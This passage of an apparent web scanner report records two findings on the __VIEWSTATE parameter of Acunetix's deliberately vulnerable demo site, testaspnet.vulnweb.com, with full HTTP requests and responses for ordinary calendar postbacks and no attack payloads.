</TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8187&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCA06thQ9oIZGRkBCP73zd1UZyLQ8PaHZBc06PsgVM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKl5ontAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8qKdq4NfWHMmgWYaFLFKDUdEoMvw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:11 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCA06thQ9oIZGRkBCP73zd1UZyLQ8PaHZBc06PsgVM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKl5ontAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8qKdq4NfWHMmgWYaFLFKDUdEoMvw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:White" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8203&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAb1L0T9oIZGRkC3WueodcpGqhPAguhWwGtI17VQY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5jMrZAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2BwhY3%2F9V34igxc%2FJoL7IceGEsEjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:47 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAb1L0T9oIZGRkC3WueodcpGqhPAguhWwGtI17VQY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5jMrZAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+whY3/9V34igxc/JoL7IceGEsEjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:White" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 